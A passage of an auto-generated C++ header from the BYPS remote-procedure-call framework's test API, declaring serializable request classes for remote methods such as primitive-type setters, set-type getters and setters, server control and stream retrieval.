public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_setLong
// typeId=244249821
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_setLong : public BMethodRequest {
public: int64_t v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_setLong();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_setLong(int64_t v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_setObject
// typeId=1425359520
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_setObject : public BMethodRequest {
public: PSerializable v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_setObject();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_setObject(const PSerializable& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_setPrimitiveTypes
// typeId=225526541
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_setPrimitiveTypes : public BMethodRequest {
public: byps::test::api::prim::PPrimitiveTypes v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_setPrimitiveTypes();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_setPrimitiveTypes(const byps::test::api::prim::PPrimitiveTypes& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_setShort
// typeId=1011932613
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_setShort : public BMethodRequest {
public: int16_t v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_setShort();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_setShort(int16_t v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_setString
// typeId=1293977038
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_setString : public BMethodRequest {
public: ::std::wstring v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_setString();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemotePrimitiveTypes_setString(const ::std::wstring& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_throwException
// typeId=1278149706
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_throwException : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_throwException();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemotePrimitiveTypes_voidFunctionVoid
// typeId=2033139391
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemotePrimitiveTypes_voidFunctionVoid : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemotePrimitiveTypes_voidFunctionVoid();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteProcessingEx_getValueAfterProcessingExceptions
// typeId=1155485035
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteProcessingEx_getValueAfterProcessingExceptions : public BMethodRequest {
public: int32_t sleepSeconds;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteProcessingEx_getValueAfterProcessingExceptions();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteProcessingEx_getValueAfterProcessingExceptions(int32_t sleepSeconds);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteReferences_getNode
// typeId=1366991859
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteReferences_getNode : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteReferences_getNode();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteReferences_setNode
// typeId=693117721
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteReferences_setNode : public BMethodRequest {
public: byps::test::api::refs::PNode v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteReferences_setNode();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteReferences_setNode(const byps::test::api::refs::PNode& v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteServerCtrl_getPublishedRemote
// typeId=648762723
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteServerCtrl_getPublishedRemote : public BMethodRequest {
public: ::std::wstring name;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteServerCtrl_getPublishedRemote();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteServerCtrl_getPublishedRemote(const ::std::wstring& name);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteServerCtrl_publishRemote
// typeId=1543768912
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteServerCtrl_publishRemote : public BMethodRequest {
public: ::std::wstring name;
public: PRemote remote;
public: bool fowardToOtherServers;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteServerCtrl_publishRemote();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteServerCtrl_publishRemote(const ::std::wstring& name, const PRemote& remote, bool fowardToOtherServers);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteServerCtrl_removePublishedRemote
// typeId=135366859
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteServerCtrl_removePublishedRemote : public BMethodRequest {
public: ::std::wstring name;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteServerCtrl_removePublishedRemote();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteServerCtrl_removePublishedRemote(const ::std::wstring& name);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_getBoolean1
// typeId=2114990909
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_getBoolean1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_getBoolean1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_getByte1
// typeId=901695825
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_getByte1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_getByte1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_getByte2
// typeId=901695824
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_getByte2 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_getByte2();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_getChar1
// typeId=901296607
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_getChar1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_getChar1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_getDate1
// typeId=900563767
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_getDate1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_getDate1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_getDouble1
// typeId=1751651450
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_getDouble1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_getDouble1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_getFloat1
// typeId=2080406641
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_getFloat1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_getFloat1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_getInt1
// typeId=1772226268
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_getInt1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_getInt1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_getInt2
// typeId=1772226269
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_getInt2 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_getInt2();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_getLong1
// typeId=892764229
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_getLong1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_getLong1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_getObj1
// typeId=1772393172
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_getObj1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_getObj1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_getPrimitiveTypes1
// typeId=669274715
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_getPrimitiveTypes1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_getPrimitiveTypes1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_getShort1
// typeId=1711905425
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_getShort1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_getShort1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_getString1
// typeId=1183412410
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_getString1 : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_getString1();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_setBoolean1
// typeId=2091396559
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_setBoolean1 : public BMethodRequest {
public: byps::PSetBoolean boolean1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_setBoolean1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteSetTypes_setBoolean1(const byps::PSetBoolean& boolean1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_setByte1
// typeId=1462808285
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_setByte1 : public BMethodRequest {
public: byps::PSetByte byte1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_setByte1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteSetTypes_setByte1(const byps::PSetByte& byte1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_setByte2
// typeId=1462808284
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_setByte2 : public BMethodRequest {
public: byps_ptr< ::std::set< PBytes > > byte2;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_setByte2();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteSetTypes_setByte2(const byps_ptr< ::std::set< PBytes > >& byte2);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_setChar1
// typeId=1462409067
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_setChar1 : public BMethodRequest {
public: byps::PSetCharacter char1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_setChar1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteSetTypes_setChar1(const byps::PSetCharacter& char1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_setDate1
// typeId=1461676227
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_setDate1 : public BMethodRequest {
public: byps::PSetDate obj1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_setDate1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteSetTypes_setDate1(const byps::PSetDate& obj1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_setDouble1
// typeId=185153786
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_setDouble1 : public BMethodRequest {
public: byps::PSetDouble double1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_setDouble1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteSetTypes_setDouble1(const byps::PSetDouble& double1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_setFloat1
// typeId=1999943579
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_setFloat1 : public BMethodRequest {
public: byps::PSetFloat float1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_setFloat1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteSetTypes_setFloat1(const byps::PSetFloat& float1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_setInt1
// typeId=462631448
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_setInt1 : public BMethodRequest {
public: byps::PSetInteger int1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_setInt1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteSetTypes_setInt1(const byps::PSetInteger& int1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_setInt2
// typeId=462631447
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_setInt2 : public BMethodRequest {
public: byps_ptr< ::std::set< PArrayInt > > int2;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_setInt2();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteSetTypes_setInt2(const byps_ptr< ::std::set< PArrayInt > >& int2);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_setLong1
// typeId=1453876689
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_setLong1 : public BMethodRequest {
public: byps::PSetLong long1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_setLong1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteSetTypes_setLong1(const byps::PSetLong& long1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_setObj1
// typeId=462464544
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_setObj1 : public BMethodRequest {
public: byps_ptr< ::std::set< PSerializable > > obj1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_setObj1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteSetTypes_setObj1(const byps_ptr< ::std::set< PSerializable > >& obj1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_setPrimitiveTypes1
// typeId=250758937
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_setPrimitiveTypes1 : public BMethodRequest {
public: byps_ptr< ::std::set< byps::test::api::prim::PPrimitiveTypes > > primitiveTypes1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_setPrimitiveTypes1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteSetTypes_setPrimitiveTypes1(const byps_ptr< ::std::set< byps::test::api::prim::PPrimitiveTypes > >& primitiveTypes1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_setShort1
// typeId=1926522501
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_setShort1 : public BMethodRequest {
public: byps::PSetShort short1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_setShort1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteSetTypes_setShort1(const byps::PSetShort& short1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteSetTypes_setString1
// typeId=753392826
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteSetTypes_setString1 : public BMethodRequest {
public: byps::PSetString string1;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteSetTypes_setString1();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteSetTypes_setString1(const byps::PSetString& string1);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteStreams_getImage
// typeId=61677379
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteStreams_getImage : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteStreams_getImage();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteStreams_getImages
// typeId=1911998634
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteStreams_getImages : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteStreams_getImages();
public: virtual BTYPEID BSerializable_getTypeId();
